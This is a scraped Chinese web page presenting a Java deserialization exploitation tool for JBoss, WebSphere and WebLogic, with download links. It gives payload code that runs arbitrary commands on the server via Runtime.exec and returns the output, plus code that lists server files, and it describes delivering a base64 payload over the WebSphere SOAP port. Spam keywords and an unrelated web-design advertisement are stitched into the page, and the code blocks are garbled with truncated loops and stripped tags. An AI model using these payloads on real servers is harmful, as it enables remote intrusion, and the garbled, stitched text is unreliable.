日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
Java反序列化集成工具

0X00 概述

為秀嶼等地區(qū)用戶提供了全套網(wǎng)頁(yè)設(shè)計(jì)制作服務(wù),及秀嶼網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)、秀嶼網(wǎng)站設(shè)計(jì),以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務(wù),秉承以專業(yè)、用心的態(tài)度為用戶提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶的要求,就會(huì)得到認(rèn)可,從而選擇與我們長(zhǎng)期合作。這樣,我們也可以走得更遠(yuǎn)!

Java反序列化漏洞已經(jīng)被曝出一段時(shí)間了,本人參考了網(wǎng)上大神的放出來(lái)的工具,將Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。其實(shí),WebSphere的利用過(guò)程也和JBoss差不多,只不過(guò)在發(fā)送Payload和解析結(jié)果的時(shí)候多了個(gè)Base64編碼(解碼)的過(guò)程。

本工具暫時(shí)支持的功能:

1、本地命令執(zhí)行并回顯,無(wú)須加載外部jar包,支持純內(nèi)網(wǎng)環(huán)境檢測(cè)。

2、支持JBoss、WebSphere和Weblogic的反序列化漏洞檢測(cè)。

3、支持https數(shù)據(jù)傳輸。

4、支持文件目錄列表。

0X01 WebSphere的反序列化漏洞利用過(guò)程

WebSphere的反序列化漏洞發(fā)生的位置在SOAP的通信端口8880,使用的通信協(xié)議是https,發(fā)送的數(shù)據(jù)是XML格式的數(shù)據(jù)。

 
 
 
 
    
  
  
  
  
  1.  
    2. 
  
  
  
  
  2.    
    3. 
  
  
  
  
  3.    
    4. 
  
  
  
  
  4.   BasicAuth 
    5. 
  
  
  
  
  5.    
    6. 
  
  
  
  
  6.    
    7. 
  
  
  
  
  7.    
    8. 
  
  
  
  
  8.   Base64(payload) 
    9. 
  
  
  
  
  9.   ringBufferSize 
    10. 
  
  
  
  
  10.    
    11. 
  
  
  
  
  11.    
    12. 
  
  
  
  
  12.    
    13.

將我們構(gòu)造的執(zhí)行命令的payload通過(guò)base64編碼后放在objectname節(jié)點(diǎn)中,通過(guò)https發(fā)送到服務(wù)器端,服務(wù)器端調(diào)用相應(yīng)的執(zhí)行函數(shù),將結(jié)果發(fā)送給客戶端,同樣的,返回的數(shù)據(jù)也是經(jīng)過(guò)base64編碼的。WebSphere的Payload和JBoss的基本一致。如下是執(zhí)行命令的payload。

 
 
 
 
    
  
  
  
  
  1. public RunCommand(String command) throws Exception  
    2. 
  
  
  
  
  2.    {  
    3. 
  
  
  
  
  3.            Process proc = Runtime.getRuntime().exec(command);  
    4. 
  
  
  
  
  4.            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));  
    5. 
  
  
  
  
  5.            StringBuffer sb = new StringBuffer();  
    6. 
  
  
  
  
  6.            String line;  
    7. 
  
  
  
  
  7.            while ((line = br.readLine()) != null)  
    8. 
  
  
  
  
  8.            {  
    9. 
  
  
  
  
  9.                sb.append(line).append("\n");  
    10. 
  
  
  
  
  10.            }  
    11. 
  
  
  
  
  11.            String result = "\r\n\r\n==========" + sb.toString() + "==========\r\n";  
    12. 
  
  
  
  
  12.            br.close();  
    13. 
  
  
  
  
  13.            Exception e=new Exception(result);  
    14. 
  
  
  
  
  14.            throw e;  
    15. 
  
  
  
  
  15.    } 
    16.

將命令執(zhí)行結(jié)果以字符隔開(kāi),這樣在客戶端獲取數(shù)據(jù)后,可通過(guò)split、substring等方法對(duì)命令的執(zhí)行結(jié)果進(jìn)行解析。解析命令的源碼如下:

 
 
 
 
    
  
  
  
  
  1. public static String parseResult(String result)  
    2. 
  
  
  
  
  2.    {  
    3. 
  
  
  
  
  3.    String tmp=result.split("")[1];  
    4. 
  
  
  
  
  4.    String reString=tmp.split("")[0];  
    5. 
  
  
  
  
  5.    String resultTmp=new String(Base64.getDecoder().decode(reString));  
    6. 
  
  
  
  
  6.    int x1=resultTmp.indexOf("==========")+10;  
    7. 
  
  
  
  
  7.    int x2=resultTmp.lastIndexOf("==========")-1;  
    8. 
  
  
  
  
  8.    String returnValue="";  
    9. 
  
  
  
  
  9.    if(x1>=0&&x2>=0)  
    10. 
  
  
  
  
  10.    returnValue=resultTmp.substring(x1, x2).trim();  
    11. 
  
  
  
  
  11.    else  
    12. 
  
  
  
  
  12.    returnValue=resultTmp;  
    13. 
  
  
  
  
  13.    return returnValue;  
    14. 
  
  
  
  
  14.    } 
    15.

0X02 文件列表讀取

獲取文件列表的功能是通過(guò)Java的listRoot和listFiles來(lái)實(shí)現(xiàn)的,獲取文件和目錄列表的過(guò)程和命令執(zhí)行大概相同。在這我就簡(jiǎn)單的描述一下過(guò)程:如果傳入方法的是一個(gè)空值,那么就通過(guò)Files.listRoot獲取根目錄或者驅(qū)動(dòng)器列表,否則,傳入的值是路徑的話,就通過(guò)file.listFiles方法獲取目錄下的所有文件和目錄,將獲取到的目錄名放到{}中,將文件名放在[]中,這樣,就方便我們?cè)诔绦蛑袑?duì)獲取到的數(shù)據(jù)進(jìn)行解析。

獲取目錄的payload代碼如下:

 
 
 
 
    
  
  
  
  
  1. public GetFileList(String fileName) throws Exception  
    2. 
  
  
  
  
  2.     {  
    3. 
  
  
  
  
  3.     StringBuilder sb=new StringBuilder();  
    4. 
  
  
  
  
  4.     String result=new String();  
    5. 
  
  
  
  
  5.     if(fileName.isEmpty())  
    6. 
  
  
  
  
  6.     {  
    7. 
  
  
  
  
  7.     File[] files=File.listRoots();  
    8. 
  
  
  
  
  8.     for(int i=0;i
  
  
  
  
  9.     {  
    10. 
  
  
  
  
  10.     sb.append(files[i].getAbsolutePath()).append(",");  
    11. 
  
  
  
  
  11.     }  
    12. 
  
  
  
  
  12.     result="{"+sb.toString().substring(0,sb.toString().length()-1)+"}";  
    13. 
  
  
  
  
  13.     }  
    14. 
  
  
  
  
  14.     else  
    15. 
  
  
  
  
  15.     {  
    16. 
  
  
  
  
  16.     File file=new File(fileName);  
    17. 
  
  
  
  
  17.     StringBuilder dirList=new StringBuilder();  
    18. 
  
  
  
  
  18.     StringBuilder fileList=new StringBuilder();  
    19. 
  
  
  
  
  19.     if(file.isDirectory())  
    20. 
  
  
  
  
  20.     {  
    21. 
  
  
  
  
  21.     File[] list=file.listFiles();  
    22. 
  
  
  
  
  22.     dirList.append("{");  
    23. 
  
  
  
  
  23.     fileList.append("[");  
    24. 
  
  
  
  
  24.     for(int i=0;i
  
  
  
  
  25.     {  
    26. 
  
  
  
  
  26.     if(list[i].isDirectory())  
    27. 
  
  
  
  
  27.     dirList.append(list[i].getAbsolutePath()).append(",");  
    28. 
  
  
  
  
  28.     else  
    29. 
  
  
  
  
  29.     fileList.append(list[i].getAbsolutePath()).append(",");  
    30. 
  
  
  
  
  30.     }  
    31. 
  
  
  
  
  31.     }  
    32. 
  
  
  
  
  32.     if(!dirList.toString().isEmpty())  
    33. 
  
  
  
  
  33.     sb.append(dirList.toString().substring(0,dirList.toString().length()-1)).append("}");  
    34. 
  
  
  
  
  34.     if(!fileList.toString().isEmpty())  
    35. 
  
  
  
  
  35.     sb.append(fileList.toString().substring(0,fileList.toString().length()-1)).append("]");  
    36. 
  
  
  
  
  36.     result=sb.toString();  
    37. 
  
  
  
  
  37.     }  
    38. 
  
  
  
  
  38.     result="\r\n\r\n==========\r\n"+result+"\r\n==========\r\n";  
    39. 
  
  
  
  
  39.     Exception e=new Exception(result);  
    40. 
  
  
  
  
  40.             throw e;  
    41. 
  
  
  
  
  41.     } 
    42.

解析的時(shí)候,先將執(zhí)行結(jié)果分離出來(lái),再對(duì)結(jié)果base64解碼,再進(jìn)一步區(qū)分目錄和文件,分別添加到界面的目錄樹(shù)中。

注:設(shè)計(jì)時(shí)為了美觀,使用了JavaFX來(lái)設(shè)計(jì)界面,運(yùn)行時(shí)需要JDK1.8環(huán)境。

程序運(yùn)行效果如下:

 

工具下載地址:http://pan.baidu.com/s/1sjXjsBz 密碼: b423

2016.1.5 工具更新內(nèi)容:

地址: http://pan.baidu.com/s/1jGSEFFS 密碼: si6t

1.多線程處理任務(wù),解決命令執(zhí)行過(guò)程中界面無(wú)法響應(yīng)的問(wèn)題

2.[Bug Fix]weblogic console端口改為80時(shí)無(wú)法獲取數(shù)據(jù)

3.[Bug Fix]weblogic第一次獲取信息或執(zhí)行命令響應(yīng)時(shí)間過(guò)長(zhǎng)的問(wèn)題


當(dāng)前名稱:Java反序列化集成工具
文章位置:http://www.dlmjj.cn/article/cceihjc.html